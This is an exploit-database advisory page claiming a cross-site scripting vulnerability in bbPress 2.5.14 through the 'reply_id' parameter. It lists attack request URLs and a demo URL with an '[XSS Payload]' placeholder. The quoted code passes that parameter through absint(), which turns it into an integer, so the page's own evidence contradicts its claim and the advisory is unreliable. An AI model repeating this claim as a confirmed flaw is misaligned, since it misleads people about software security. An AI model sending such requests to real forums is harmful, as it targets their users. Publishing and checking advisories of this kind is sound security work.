bbPress 2.5.14 - Cross Site Scripting Vulnerability

2018.06.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#-------------------------------------------------------# # Exploit Title: bbPress 2.5.14 - Cross Site Scripting Vulnerability # Exploit Author: Iran Cyber Security Group # Date: 2018-06-25 # Vendor Homepage: https://bbpress.org/ # Tested on: Kali Linux #--------------------------------------------------------# # PoC: Vuln in includes\common\template.php file in line 1691: <input type="hidden" name="bbp_reply_id" id="bbp_reply_id" value="<?php echo absint( $_GET['reply_id'] ); ?>" /> method 1: you can use "reply_id" parameter for set Your XSS payloads exploits: /?action=move&reply_id=6 /?action=split&reply_id=6 /?action=bbp_toggle_reply_trash&sub_action=trash&reply_id=6&_wpnonce=369b14d8cc /?action=bbp_toggle_reply_spam&reply_id=6&_wpnonce=8d6a680387 Demo: http://127.0.0.1/wordpress/forums/reply/test/edit/?action=move&reply_id=6[XSS Payload] Method 2: You can exploit this vulnerability by "replay" a post in the forum ---------------------------------------------------------# | Discovered By:Unkn0wn [unkn0wn@danwin1210.me]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top